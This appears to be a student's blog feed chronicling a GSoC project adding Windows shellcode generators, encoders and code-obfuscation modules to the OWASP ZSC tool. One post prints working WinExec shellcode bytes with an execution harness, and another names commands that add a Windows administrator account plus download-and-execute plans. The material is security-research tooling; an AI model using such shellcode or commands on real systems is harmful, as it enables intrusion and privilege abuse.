tag:blogger.com,1999:blog-28181262870689073242024-02-06T19:58:25.066-08:00Blog - Pratik PatelAnonymoushttp://www.blogger.com/profile/07749275617346769080noreply@blogger.comBlogger8125tag:blogger.com,1999:blog-2818126287068907324.post-73581717223192847942016-08-10T07:49:00.004-07:002016-08-20T06:37:55.016-07:00GSoC Work Submission <div dir="ltr" style="text-align: left;" trbidi="on">
Hello,<br />
<br />
This is the direct link to all the work that is done during GSOC period :<br />
PR Link:<a href="https://github.com/zscproject/OWASP-ZSC/pulls?utf8=%E2%9C%93&q=is%3Apr%20is%3Aclosed%20author%3APratik151%20created%3A2016-05-23..2016-08-15"> https://github.com/zscproject/OWASP-ZSC/pulls?utf8=%E2%9C%93&q=is%3Apr%20is%3Aclosed%20author%3APratik151%20created%3A2016-05-23..2016-08-15</a><br />
<br />
Commits link : <a href="https://github.com/zscproject/OWASP-ZSC/commits?author=Pratik151&page=1">https://github.com/zscproject/OWASP-ZSC/commits?author=Pratik151&page=1</a><br />
<br />
First part of my project was writing Windows Shellcode, It was great part to learn about shellcode as I didn't have much knowledge about shellcode before I started contributing to ZSC.<br />
<br />
At first I created Opcoder which converts the assembly code to opcodes - <a href="https://github.com/zscproject/OWASP-ZSC/blob/master/lib/opcoder/windows_x86.py">https://github.com/zscproject/OWASP-ZSC/blob/master/lib/opcoder/windows_x86.py</a><br />
<br />
Then I created Windows Execute Shellcode which takes parameter as filename to be executed to generate shellcode - <a href="https://github.com/zscproject/OWASP-ZSC/blob/master/lib/generator/windows_x86/exec.py">https://github.com/zscproject/OWASP-ZSC/blob/master/lib/generator/windows_x86/exec.py</a><br />
<br />
Next was create directory Shellcode - <a href="https://github.com/zscproject/OWASP-ZSC/blob/master/lib/generator/windows_x86/dir_create.py">https://github.com/zscproject/OWASP-ZSC/blob/master/lib/generator/windows_x86/dir_create.py</a><br />
<br />
The other Shellcode's which were done are : <br />
creating file - <a href="https://github.com/zscproject/OWASP-ZSC/pull/47">https://github.com/zscproject/OWASP-ZSC/pull/47</a><br />
Downloading file - <a href="https://github.com/zscproject/OWASP-ZSC/pull/48">https://github.com/zscproject/OWASP-ZSC/pull/48</a><br />
Download and Execute - <a href="https://github.com/zscproject/OWASP-ZSC/pull/49">https://github.com/zscproject/OWASP-ZSC/pull/49</a><br />
Add Admin - <a href="https://github.com/zscproject/OWASP-ZSC/pull/50">https://github.com/zscproject/OWASP-ZSC/pull/50</a><br />
Disable Firewall - <a href="https://github.com/zscproject/OWASP-ZSC/pull/51">https://github.com/zscproject/OWASP-ZSC/pull/51</a><br />
<br />
Next I started working on obfuscation modules. Created Reverse hex and reverse base64 obfuscation modules for Ruby, Python, Perl, Javascript and php. Here are the PR's :<br />
<a href="https://github.com/zscproject/OWASP-ZSC/pull/60">https://github.com/zscproject/OWASP-ZSC/pull/60</a><br />
<a href="https://github.com/zscproject/OWASP-ZSC/pull/62">https://github.com/zscproject/OWASP-ZSC/pull/62</a> <br />
<a href="https://github.com/zscproject/OWASP-ZSC/pull/63">https://github.com/zscproject/OWASP-ZSC/pull/63</a> <br />
<br />
I had to work on other obfuscation modules but as ZSC tool got accepted in DEFCON we had to make Windows Shellcode part complete as that was to be presented. There were no encoding modules for Shellcode but as it was needed to complete Windows Shellcode part I started working on Encoding part. <br />
Here are the Encoding module that were created :<br />
Xor random - <a href="https://github.com/zscproject/OWASP-ZSC/pull/64">https://github.com/zscproject/OWASP-ZSC/pull/64</a> <a href="https://github.com/zscproject/OWASP-ZSC/pull/70">https://github.com/zscproject/OWASP-ZSC/pull/70</a><br />
Add random - <a href="https://github.com/zscproject/OWASP-ZSC/pull/73">https://github.com/zscproject/OWASP-ZSC/pull/73</a><br />
Sub random - <a href="https://github.com/zscproject/OWASP-ZSC/pull/78">https://github.com/zscproject/OWASP-ZSC/pull/78</a><br />
xor yourvalue - <a href="https://github.com/zscproject/OWASP-ZSC/pull/79">https://github.com/zscproject/OWASP-ZSC/pull/79</a><br />
inc and dec encodes - <a href="https://github.com/zscproject/OWASP-ZSC/pull/103/commits/e0364d3cda3b30caeabc06773586ec1914b96798">https://github.com/zscproject/OWASP-ZSC/pull/103/commits/e0364d3cda3b30caeabc06773586ec1914b96798</a><br />
inc yourvalue and dec yourvalue - <a href="https://github.com/zscproject/OWASP-ZSC/pull/103/commits/4c49c10c29506ea9e49df6fcdcec86b1c5d26ee2">https://github.com/zscproject/OWASP-ZSC/pull/103/commits/4c49c10c29506ea9e49df6fcdcec86b1c5d26ee2</a><br />
Add yourvalue and sub yourvalue - <a href="https://github.com/zscproject/OWASP-ZSC/pull/103/commits/61a5b2ff49c021bcb5b7bc65042547e71bf0a6d5">https://github.com/zscproject/OWASP-ZSC/pull/103/commits/61a5b2ff49c021bcb5b7bc65042547e71bf0a6d5</a><br />
<br />
After Encoding modules part as I didn't have much time to add complex obfuscation module I started working on simple ascii obfuscation module and here is the PR - <a href="https://github.com/zscproject/OWASP-ZSC/pull/103">https://github.com/zscproject/OWASP-ZSC/pull/103</a><br />
<br />
If you are interested in contributing/learning more about the tool refer the documentation : <a href="https://ali-razmjoo.gitbooks.io/owasp-zsc/content/">https://ali-razmjoo.gitbooks.io/owasp-zsc/content/</a><br />
<br />
It was great experience to work on ZSC tool as I learned many things about exploits, Shellcode etc., I would like to thanks OWASP Organizations, my mentors Brian for helping me to learn about shellcode and clearing my doubts, Johanna is great leader who is doing everything she can for ZSC and also Ali for helping me with project, also reviewing PR's and for creating this tool :). GSoC will be ending but I will still be contributing to ZSC tool. Next couple of months ZSC tool will be still having new changes as it is likely to participate in BlackHat Arsenal EU (Johanna applied for it already) and we can add some new features to the tool. Also we have working API and osx shellcode added to tool. Thanks to <a href="https://github.com/CodeMaxx">Akash Trehan</a> for adding osx module. <br />
<br />
<br /></div>
Anonymoushttp://www.blogger.com/profile/07749275617346769080noreply@blogger.com0tag:blogger.com,1999:blog-2818126287068907324.post-45887144872378211852016-07-20T10:59:00.003-07:002016-07-20T10:59:46.216-07:00Shellcode Encoders and code obfuscation modules<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
So there are lots of things added to tools in last 2-3 weeks. Everyone is actively working for the tool. So in my last post I completed Download to file shellcode and after that I added couple of shellcodes like add admin and disable firewall. All the shellcodes in the tool can be seen <a href="https://github.com/zscproject/OWASP-ZSC/tree/master/lib/generator/windows_x86">here</a>.<br />
<br />
Then I started working on code obfuscation modules for some time. I added Reverse hex and reverse base64 modules to the tool. <a href="https://github.com/zscproject/OWASP-ZSC/pull/60/files">Here</a> is the code for python and javascript. This module was also developed for perl, ruby. I tested the modules with different languages on both python 2 and 3 and it worked correctly.<br />
<br />
As the org was selected for DEFCON 2016 we wanted to complete windows shellcode with encoders and also add osx shellcode. So in place of starting some complex obfuscation method I started working on encoders for windows shellcode. I added <a href="https://github.com/zscproject/OWASP-ZSC/blob/master/lib/encoder/windows_x86/xor_random.py">xor_random</a>, <a href="https://github.com/zscproject/OWASP-ZSC/blob/master/lib/encoder/windows_x86/add_random.py">add_random</a>, <a href="https://github.com/zscproject/OWASP-ZSC/blob/master/lib/encoder/windows_x86/sub_random.py">sub_random</a> and <a href="https://github.com/zscproject/OWASP-ZSC/blob/master/lib/encoder/windows_x86/xor_yourvalue.py">xor_yourvalue</a>. I also have done add_yourvalue but we are trying to fix <a href="https://github.com/zscproject/OWASP-ZSC/issues/80">this</a> issue before I add other encoders to the tool.<br />
<br />
All the PR's made by me can be found here : <a href="https://github.com/zscproject/OWASP-ZSC/pulls?q=is%3Apr+is%3Aclosed+author%3APratik151">https://github.com/zscproject/OWASP-ZSC/pulls?q=is%3Apr+is%3Aclosed+author%3APratik151</a> if you want to look at code.<br />
<br />
Also zsc tool now has osx shellcode also thanks to <a href="https://codemaxx.github.io/">Akash Trehan</a>. He added osx shellcode to the tool. Also thanks to Ali, Brian and Johanna for helping me.<br />
<br /></div>
Anonymoushttp://www.blogger.com/profile/07749275617346769080noreply@blogger.com0tag:blogger.com,1999:blog-2818126287068907324.post-22832875778435936422016-06-21T09:41:00.001-07:002016-06-21T09:41:34.729-07:00GSoC project Status<div dir="ltr" style="text-align: left;" trbidi="on">
Hello,<br />
<br />
I didn't made post last week so I will be discussing about shellcodes which I did previous week also.<br />
<br />
I started working on Create Directory shellcode in week 2 and completed it soon as It wasn't big as I used function <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa363855(v=vs.85).aspx">CreateDirectoryA</a> which is available in kernel32.dll so there was no need to load any dll's into process.<br />
<br />
Then came the next shellcode Creating File, I thought it would be straightforward Load msvcrt.dll library > Find fopen to create file > find fprintf and use it to write to file > Close file . But when I started to work on it fopen was not working as usual, It was changing stack so I was not able to get the values like kernel32.dll address which I saved in stack for later use. I tried debugging it but couldn't find it as fopen was giving some error values and calling _wfopen and so stack was changing. Using fopen, file was created but stack was not same so I couldn't get values which I saved on stack. I was still able to write code which after creating file, exits successfully but it was getting long. So Ali said about system() which he used for creating linux create file Shellcode. system function is in msvcrt.dll so I loaded it first and then after finding address used it as system("echo data>file"). Here is create file shellcode : <a href="https://github.com/Ali-Razmjoo/OWASP-ZSC/pull/47/files">https://github.com/Ali-Razmjoo/OWASP-ZSC/pull/47/files</a> . It takes two values one is file name and other is content of file.<br />
<br />
Next I started working on downloading file shellcode. This will be created as two shellcodes : 1. for downloading file 2. downloading and executing file. I completed both of them and PR of downloading file is merged <a href="https://github.com/Ali-Razmjoo/OWASP-ZSC/pull/48">https://github.com/Ali-Razmjoo/OWASP-ZSC/pull/48 </a> now I am pushing the shellcode of download and execute. For downloading I used <a href="https://msdn.microsoft.com/en-us/library/ms775123(v=vs.85).aspx">URLDownloadToFileA</a> function. The Shellcode takes values as url and filename. I spend one day on execution part after completing the download part and after lot of debugging I found that I was doing mistake where I was passing parameters in wrong order :P<br />
<br />
I am on my schedule and next I will be working on Creating user and adding to admin. I will be using NetUserAdd method or do this part through command whichever would be short. <br />
<br />
</div>
Anonymoushttp://www.blogger.com/profile/07749275617346769080noreply@blogger.com0tag:blogger.com,1999:blog-2818126287068907324.post-61856914311373120832016-06-07T01:48:00.002-07:002016-06-07T01:48:09.834-07:00GSoC Week 2 : Opcoder and Windows Shellcode<div dir="ltr" style="text-align: left;" trbidi="on">
Hello,<br />
<br />
Completed 2nd week of GSOC and it was a good one :)<br />
<br />
This week I made opcoder that converts the assembly code to opcodes. I worked mostly with the tool, adding windows options to the tool and all. It was made easy because of great tutorial by Ali here : <a href="https://ali-razmjoo.gitbooks.io/owasp-zsc/content/English/developers_s1.html">https://ali-razmjoo.gitbooks.io/owasp-zsc/content/English/developers_s1.html</a> . and the second thing that I did was converted static shellcode of calc.exe to dynamic so it can execute any file. First I started by writing that myself and I spent a day on it and then I came across <a href="https://github.com/Ali-Razmjoo/OWASP-ZSC/blob/master/core/stack.py#L26">generate</a> function which was there in tool which does the same thing so used that for opcoder. I didn't interact daily with my mentor Brian this week as I was able to do most of my work but I interacted with Ali many times as I had questions with tool. Whenever I ask any doubts to Brian or Ali they reply very fast without taking much time though they are busy with their job. Good to have such active mentors :).Here are couple of screenshots from tool of the options and shellcode generated.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpIgpAEzxy0ANfpptQaRiXtvaEKjJluXjW7dFL5xCmFijus82uS1KyrOuGAXG3JkXHigU3dSiax5p-5Qdyz7UdKcDKN34lUAqfoQ70jQSNqvgXn6eI_HmmlGD9EtXtUgiJyTPk3sZJpE8/s1600/bec3bdc3-2e5e-4717-b364-54b1eea428a6.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpIgpAEzxy0ANfpptQaRiXtvaEKjJluXjW7dFL5xCmFijus82uS1KyrOuGAXG3JkXHigU3dSiax5p-5Qdyz7UdKcDKN34lUAqfoQ70jQSNqvgXn6eI_HmmlGD9EtXtUgiJyTPk3sZJpE8/s320/bec3bdc3-2e5e-4717-b364-54b1eea428a6.jpg" width="320" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZbCRLK8Z5exj1uE-q3Omn0b_Pv5oIqIEZC6gM8mLHzyb90zkwUCcDx0ioCc6pUDM5rd1XK5kFTWW_cxE-_vZggctlfsQZdhwtYpO2-0vgIbGnJH9MZyFTUyosELX5K79PH1f_zPClQ5I/s1600/f4d62600-6556-4284-8768-267eadbcf6a6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="257" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZbCRLK8Z5exj1uE-q3Omn0b_Pv5oIqIEZC6gM8mLHzyb90zkwUCcDx0ioCc6pUDM5rd1XK5kFTWW_cxE-_vZggctlfsQZdhwtYpO2-0vgIbGnJH9MZyFTUyosELX5K79PH1f_zPClQ5I/s320/f4d62600-6556-4284-8768-267eadbcf6a6.jpg" width="320" /> </a> </div>
<div class="separator" style="clear: both; text-align: center;">
(Ignore that line by line opcodes in 2nd ss it was print statement :P)</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
I have pushed changes to main repo here : <a href="https://github.com/Ali-Razmjoo/OWASP-ZSC/pull/46/files">https://github.com/Ali-Razmjoo/OWASP-ZSC/pull/46/files</a> I feel that the opcoder is messy currently but I will document it when I have all the shellcode covered, as with other shellcodes coming I think it will change a lot in coming weeks.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
I started create directory shellcode yesterday. It was planned to be started at end of week 2 but started in week 3. So to keep going with schedule, this week I should complete Create Directory and Write to File shellcode. I almost completed create directory shellcode as it uses function CreateDirectory which is already in kernel32.dll so I hope remaining time will be enough to compete file shellcode as it is slightly complicated as it requires functions like fopen,fwrite which are present in other dll which needs to be loaded into process.</div>
</div>
Anonymoushttp://www.blogger.com/profile/07749275617346769080noreply@blogger.com0tag:blogger.com,1999:blog-2818126287068907324.post-51470388162287062282016-05-28T06:13:00.001-07:002016-05-28T06:18:49.441-07:00Windows Shellcode for executing file - Week 1<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="tr_bq">
Hello,</div>
<br />
Its time for blog post :). This week was good learning experience. In last couple of post I forgot to thank my mentors for helping me :P. Thank you Brian, Johanna and Ali for accepting me to the project.<br />
<br />
This week I learned a lot about Shellcode part. My mentor Brian was helping me with all my doubts. Whenever I had any doubts even if its small doubt and I couldn't understand after googling for sometime then I use to ask Brian and he was very helpful. He is always responsive and gives best descriptive answers. So first I started by learning Shellcode in general from <a href="http://as.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html">The Shellcoder's Handbook</a> and some other resources. I learned about Linux shellcode first and it was good one. And When I switched to Windows Shellcode Part everything was different. It took sometime to slowly understand everything. After reading lot of tutorial, papers and shellcodes I was able to write WinExec shellcode that spawns calc. It was amazing moment when calc spawned without any segfaults :).<br />
<br />
The problem with writing shellcode for windows is that the base address of kernel32.dll changes from version to version of windows.So we can't hardcode the address of kernel32.dll. So the things that we have to do to write windows shellcode is :<br />
<br />
1. Find kernel32.dll base address using Process Environment Block (PEB).<br />
2. Parse it’s export table to locate GetProcAddress<br />
3. Use GetProcAddress to locate LoadLibrary<br />
4. Use LoadLibrary to load other dll into current address space<br />
5. Then again use GetProcAddress to locate required functions which are needed for
writing shellcode.<br />
<br />
For writing Execute Shellcode we will require WinExec function which is in kernel32.dll. So first we have to find kernel32.dll and then we have to find GetProcAddress and using GetProcAddress we have to find WinExec address and then we can use WinExec and to exit we can use ExitProcess method which is also in kernel32.dll. So for this shellcode we don't need to load any other dll's.<br />
<br />
First we have to find kernel32.dll base address. As described in skape paper and some other papers we can use PEB method to get kernel32.dll base address as :<br />
<blockquote class="tr_bq">
xor ecx, ecx<br />
mov eax, [fs:ecx + 0x30] ; GET PEB<br />
mov eax, [eax + 0xc] ; PEB->Ldr<br />
mov esi, [eax + 0x14] ; PEB->Ldr.InMemOrder<br />
lodsd ; Second module<br />
xchg eax, esi<br />
lodsd ; Third module(kernel)<br />
mov ebx, [eax + 0x10] ; base address of kernel32.dll</blockquote>
Now we have to find offset of GetProcAddress, as offset of functions vary from functions to functions so GetProcAddress is not loaded at same offset for all kernel32.dll. We can use Export Directory table as described in <a href="http://www.hick.org/code/skape/papers/win32-shellcode.pdf">skape paper</a>. The ESI pointer stores the address of exported function names.<br />
<blockquote class="tr_bq">
<br />
mov edx, [ebx + 0x3c] ; DOS->e_lfanew<br />
add edx, ebx ; PE Header<br />
mov edx, [edx + 0x78] ; Offset export table<br />
add edx, ebx ; Export table<br />
mov esi, [edx + 0x20] ; Offset names table<br />
add esi, ebx ; Names table</blockquote>
Now we will find GetProcAddress as we will be using GetProcAddress to find address of other functions. I read about this method to find GetProcAddress by comparing name in securitycafe tutorial post about windows shellcode, it's comparing names of functions. There is also other method to find using hashes which Brian said and I will try to learn that also. Here is how we will get GetProcAddress :<br />
<blockquote class="tr_bq">
xor ecx, ecx <br />
Get_Function:<br />
inc ecx ; Increment the ordinal<br />
lodsd ; Get name offset<br />
add eax, ebx ; Get function name<br />
cmp dword [eax], 0x50746547 ; GetP<br />
jnz Get_Function<br />
cmp dword [eax + 0x4], 0x41636f72 ; rocA<br />
jnz Get_Function<br />
cmp dword [eax + 0x8], 0x65726464 ; ddre<br />
jnz Get_Function<br />
mov esi, [edx + 0x24] ; ESI = Offset ordinals<br />
add esi, ebx ; ESI = Ordinals table<br />
mov cx, [esi + ecx * 2] ; CX = Number of function<br />
dec ecx<br />
mov esi, [edx + 0x1c] ; ESI = Offset address table<br />
add esi, ebx ; ESI = Address table<br />
mov edx, [esi + ecx * 4] ; EDX = Pointer(offset)<br />
add edx, ebx ; EDX = GetProcAddress</blockquote>
Now we have GetProcAddress and we will use that to find WinExec function address.<br />
<blockquote class="tr_bq">
push ebx ; kernel32.dll base address<br />
push edx ;GetProcAddress base address<br />
xor ecx, ecx<br />
push ecx<br />
mov ecx, 0x61636578 ; xeca a will be modified with null<br />
push ecx<br />
sub dword [esp + 0x3], 0x61 ;Modify last value as null<br />
push 0x456e6957 ;WinE hex code<br />
push esp ;pointer to string<br />
push ebx ; kernel32.dll address<br />
call edx ; GetProcAddress(kernel32.dll, WinExec)</blockquote>
Now edx will contain WinExec base address and we can use that for Executing file. <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms687393(v=vs.85).aspx">WinExec </a>requires two parameters one we will store in ecx and one in ebx and push it to stack<br />
<blockquote class="tr_bq">
add esp, 0x8 ; Move stack to 8 bytes so string "WinExec\0" will be removed<br />
pop ecx<br />
push eax ; eax contains WinExec address<br />
xor ecx, ecx<br />
push ecx <br />
push 0x6578652e ; .exe hex value<br />
push 0x636c6163 ;calc hex value<br />
xor ebx, ebx <br />
mov ebx, esp ;save pointer to string in ebx<br />
xor ecx, ecx<br />
push ecx<br />
push ebx ; push pointer to string calc.exe<br />
call eax ; WinExec("calc.exe",0)</blockquote>
Ok now we have spawned our calc and now we need to Exit. For that we will use GetProcAddress and find ExitProcess base address and execute ExitProcess(0) as :<br />
<blockquote class="tr_bq">
<br />
add esp, 0x10 ;skip 16bytes of stack : "calc.exe",0, WinExec address<br />
pop edx ; GetProcAddress address<br />
pop ebx ;kernel32.dll address<br />
xor ecx, ecx<br />
mov ecx, 0x61737365 ; essa<br />
push ecx<br />
sub dword [esp + 0x3], 0x61 ; "a" will be now null<br />
push 0x636f7250 ; Proc<br />
push 0x74697845 ; Exit<br />
push esp ;pointer to string<br />
push ebx ; kernel32.dll base address<br />
call edx ; GetProcAddress(kernel32.dll, ExitProcess)<br />
xor ecx, ecx ;<br />
push ecx ; 0<br />
call eax ; ExitProcess(0)</blockquote>
<br />
So that's it. I tested this shellcode in Windows XP and 8.1. I think I can still reduce few bytes as I see that I saved some base address like for WinExec which I saved on stack but didn't use later. Here is the code with shellcode in Visual Studio to test it :<br />
<blockquote>
#include <Windows.h><br />
#include <stdio.h><br />
int main()<br />
{<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>unsigned char shellcode[] = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58"<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>"\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81"<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>"\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65"<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>"\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31"<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>"\xc9\x53\x52\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x68\x57\x69\x6e\x45\x54\x53\xff"<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>"\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x31\xdb\x89\xe3"<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>"\x31\xc9\x51\x53\xff\xd0\x83\xc4\x10\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03"<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>"\x61\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0";<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>printf("Executing Shellcode...\n");<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>void *page = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>memcpy(page, shellcode, sizeof(shellcode));<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>((void(*)())page)();<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>return 0;<br />
} </blockquote>
<br />
I have to make this shellcode work so that it should execute any file not only calc.exe. I will discuss that with Brian and implement it. I have to also write opcoder now as I got code I can write opcoder and test it. I and Brian are thinking to use some libraries but I have to test library with shellcode and see if it works and discuess with Ali if we can use that library in tool.<br />
<br />
P.S : Today is my Birthday :)<br />
<br />
Thanks for reading. Have a Good day :)</div>
Anonymoushttp://www.blogger.com/profile/07749275617346769080noreply@blogger.com0tag:blogger.com,1999:blog-2818126287068907324.post-66619221633463285842016-05-18T09:29:00.000-07:002016-05-18T09:32:33.420-07:00Some details about Windows Shellcode part of GSoC project<div dir="ltr" style="text-align: left;" trbidi="on">
Completed my final exams and now its time to focus on GSoC project :).<br />
<br />
<br />
In my last blog I posted timeline which was in my proposal and in this post I will add details about Shellcode part of project which I will be completing before mid evaluation if everything goes as planned.<br />
<br />
<b>Shellcode for Windows</b><br />
<br />
For Windows there is no direct kernel interface like int 0x80. Windows provide kernel32.dll but we cannot find functions loaded at same address for different versions of windows so it's hard to use hardcoded address to write shellcode. <a href="http://www.hick.org/code/skape/papers/win32-shellcode.pdf">Skape paper</a> on Windows Shellcode describes how we can find address of function using PEB. I am not going to write the details which are there in paper here. So in summary it is like this:<br />
<br />
1. Find kernel32.dll base address using Process Environment Block (PEB)<br />
2. Parse it’s export table to locate GetProcAddress<br />
3. Use GetProcAddress to locate LoadLibrary<br />
4. Use LoadLibrary to load other dll into current address space<br />
5. Then again use GetProcAddress to locate required functions which are needed for<br />
writing shellcode.<br />
<br />
<br />
There is another way we can do this, by hardcoding the address but we will find the address of modules dynamically using python ctypes.<br />
Something like this to get address of module.<br />
<blockquote class="tr_bq">
import ctypes<br />
dll = u'kernel32.dll'<br />
module = 'WinExec'<br />
kernel32 = ctypes.windll.kernel32<br />
handle = kernel32.LoadLibraryW(dll)<br />
address = kernel32.GetProcAddress(handle,module)</blockquote>
<br />
Here is script that I wrote sometimes back to generate asm code that executes cmd.exe using functions WinExec and ExitProcess - <a href="https://gist.github.com/Pratik151/58fd921116ce314d796b">https://gist.github.com/Pratik151/58fd921116ce314d796b</a><br />
<br />
Here is rough timeline on what I am planning to do:<br />
<br />
<b>Week 1 and Week 2 (May 23 - June 5) </b><br />
Add opcoder for windows like this one which is for linux - <a href="https://github.com/Ali-Razmjoo/OWASP-ZSC/blob/master/lib/opcoder/linux_x86.py">https://github.com/Ali-Razmjoo/OWASP-ZSC/blob/master/lib/opcoder/linux_x86.py</a><br />
Add Execute Shellcode - It requires two functions WinExec and ExitProcess<br />
Start Writing to file Shellcode- It requires fopen, fclose and ExitProcess<br />
<br />
If I will be able to add the address of module dynamically using ctypes and if it works then I think the shellcode can be developed before time. But If that won't work then I have to use PEB method to get address of required functions.<br />
<br />
<b>Week 3 (June 6 - June 12)</b><br />
Complete Writing to file SC if it is not completed yet.<br />
Add Create directory shellcode. If I am able to complete it before time then I can work start next week work or If more time is left then I can start other new shellcode.<br />
<br />
<b>Week 4 & Week 5(Junt 13 - June 26)</b><br />
Add shellcode Download and Executing a file - This requires URLDownloadToFile function which is there in Urlmon.dll. But Urlmon.dll is not loaded in process when it is started so we will be needing to load the dll into process first and then only we can use URLDownloadToFile function. So we have to load Urlmon.dll into process using LoadLibrary. We can first find address of LoadLibrary dynamically using ctypes and then with that we can load Urlmon.dll and then we can use the UrlDownloadToFile function. The dll can be loaded something like this:<br />
<br />
<blockquote class="tr_bq">
GetUrlmonLibrary:<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>call LoadUrlmon<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>db ‘Urlmon.dllN’ ;N will be replaced with Null character<br />
LoadUrlmon:<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>pop ecx ;get the ‘Urlmon.dllN’ string<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>mov [ecx + 10], dl ;insert NULL for string termination<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>mov ebx, 0x7639a820 ; Base address of LoadLibraryW as we got from ctypes<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>push ecx<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>call ebx</blockquote>
Add shellcode for creating user and adding user to admin group - we can use WinExec and execute cmd.exe and directly use the command “net user<br />
USERNAME PASSWORD /ADD” and “net localgroup administrators USERNAME /ADD” or other way is to use NetUserAdd and NetLocalGroupAddMembers which is in Netapi32.dll<br />
<br />
<br />
This schedule is till mid term and after that I will spend one more week for adding one or two shellcode which are in proposal. I will post timeline for Code Obfuscation modules part while doing the project when I have time in between.<br />
<br />
<br />
Thanks for Reading this long post, Have a Good day :)</div>
Anonymoushttp://www.blogger.com/profile/07749275617346769080noreply@blogger.com0tag:blogger.com,1999:blog-2818126287068907324.post-27340111011277597282016-05-01T06:55:00.000-07:002016-05-01T20:53:34.842-07:00Timeline for GSoC project<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="tr_bq">
<span style="font-family: "courier new" , "courier" , monospace;">Hello,</span></div>
<div class="tr_bq">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<span style="font-family: "courier new" , "courier" , monospace;">I got accepted into GSoC this year and I am so excited to work with open source organization :). This summer I will be working on my project with OWASP ZSC and <a href="https://summerofcode.withgoogle.com/projects/#5901330824560640">here</a> is the link to my project on gsoc site. The project is <b>Windows Shellcode and Code Obfuscation modules</b>. So in my summer time I will be creating windows shellcode and code obfuscation modules for ZSC tool. The coding period officially starts from 23rd May and we are currently in community bonding period. In this period I have to familiarize my self with the organiszation, code base and interact with mentors and make plan about project before the full time coding begins. </span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><a href="https://docs.google.com/document/d/1_ekisZ0WebQIn69iRI1GnlNKrwoSJxGhtfRHskIgEpM/">Here</a> is my proposed timeline that I will be working on during coding period. So basically this project has two parts one is developing shellcodes for windows and second part is to add code obfuscation modules for different languages. I will be working first on shellcode part as I mentioned in my proposal most likely. I didn't write technical details of my projects which are on my proposal about shellcodes and modules on this post but I will write the technical details in next post after discussing with mentors and also more detailed timeline if possible. I will discuss with brian about shellcode part and which way I should go to develop shellcodes as in my proposal I mentioned two ways. I will try to make that discussion on mailing list mostly and if I have discussion on skype/telegram then I will post details on mailing list so that it can be helpful for others also.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">My exams starts from 3rd May. So I will be less active from May 2 - 10 but I will check mailing list regularly and I have one more exam on 16th May<span style="font-size: x-small;">(it was on 7th but was postponed)</span> but I will be available from May 11 - May 15th. After my exams I will be able to work full time and I hope to complete project successfully and learn many things :)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span><span style="font-family: "courier new" , "courier" , monospace;">In next blog I will add technical details for shellcode part and also add more details to timeline.</span></div>
Anonymoushttp://www.blogger.com/profile/07749275617346769080noreply@blogger.com0tag:blogger.com,1999:blog-2818126287068907324.post-21350765287391439062016-04-26T06:24:00.003-07:002016-04-26T09:37:23.308-07:00Hello World<div dir="ltr" style="text-align: left;" trbidi="on">
hi ,<br />
<br />
I will use this blog to post about my gsoc project. The blog will be used to keep track of gsoc project and get feedback from mentors. I will post soon about community bonding period.<br />
<br /></div>
